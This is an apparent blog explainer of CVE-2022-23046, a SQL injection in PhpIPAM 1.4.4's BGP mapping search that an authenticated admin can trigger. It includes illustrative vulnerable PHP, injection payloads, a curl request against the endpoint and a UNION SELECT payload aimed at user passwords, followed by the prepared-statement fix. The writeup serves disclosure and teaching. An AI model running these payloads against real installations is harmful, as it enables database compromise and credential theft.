CVE-2022-23046 - How an Auth Admin Can Exploit SQL Injection in PhpIPAM v1.4.4 (with Example and Analysis)

---

Introduction

In this post, we’ll break down CVE-2022-23046, a critical SQL Injection vulnerability discovered in the popular IP address management tool, PhpIPAM (v1.4.4). This flaw allows an authenticated admin user to compromise the system by injecting malicious SQL code through the subnet parameter in the BGP mapping search functionality. We'll keep the language simple and walk through the details, demonstrate the exploit with a snippet, and offer important links for more info.

What is PhpIPAM?

PhpIPAM is an open-source web application used to manage and organize IP space. It's widely used by network admins to keep track of subnets, IPs, and VLANs.

What is CVE-2022-23046?

Short version: Admin users can inject SQL commands using the subnet parameter while searching for a subnet in BGP mapping admin page, specifically in app/admin/routing/edit-bgp-mapping-search.php. This can lead to sensitive data leakage, modification, or even complete database compromise.

References:

- NVD Entry
 - Exploit DB Article
 - Original Github Issue

Where’s the Problem?

When an admin searches for a subnet in the BGP mapping interface, their input is not sanitized or parameterized before being included in a SQL query in edit-bgp-mapping-search.php.

Let’s imagine the problematic part

$subnet = $_POST['subnet']; // Admin-supplied subnet
// ... later
$q = "SELECT * FROM subnets WHERE subnet = '$subnet'";
$result = mysqli_query($db, $q);

If $subnet is not properly sanitized, whatever the user puts in gets pasted right into the SQL statement.

In the search box for subnets, enter a crafted value like

' OR 1=1-- -

This tells SQL to ignore the subnet and return all records (or potentially something worse, depending on your payload).

Exploit Snippet

Sample malicious request using curl: (replace COOKIE and URL accordingly)

curl -X POST \
  -d "subnet=' OR 1=1-- -" \
  --cookie "your_phpipam_session_cookie" \
  https://your.phpipam.instance/app/admin/routing/edit-bgp-mapping-search.php

What happens?

The SQL query becomes

SELECT * FROM subnets WHERE subnet = '' OR 1=1-- -'

Now, all subnets are returned (or worse if more complex payloads are used). If you tweak further, you could try exfiltrating data:

' UNION SELECT user, password, email FROM users-- -

Why Is This “Authenticated-Admin Only”?

Only users with admin-level access can hit this endpoint. A rogue or compromised admin could seriously damage the installation, or escalate from here if other protections are weak.

Patch & Mitigation

- Update! Patch provided in later PhpIPAM versions (Github Commit)

- Developers replaced direct variable insertion with properly prepared statements

$q = $db->prepare("SELECT * FROM subnets WHERE subnet = ?");
$q->execute([$subnet]);

Takeaway

Even trusted admin interfaces must defend against SQL injection. This kind of vulnerability, even “authenticated-only,” is dangerous, especially in tools that manage critical network infrastructure like PhpIPAM.

References

- PhpIPAM Security Github
- Mitre CVE Entry
- Exploit-DB Example
- OWASP on SQL Injection

Closing

Questions or want more security breakdowns in plain language? Comment below or follow for updates!

Timeline

Published on: 01/19/2022 21:15:00 UTC
Last modified on: 02/11/2022 14:01:00 UTC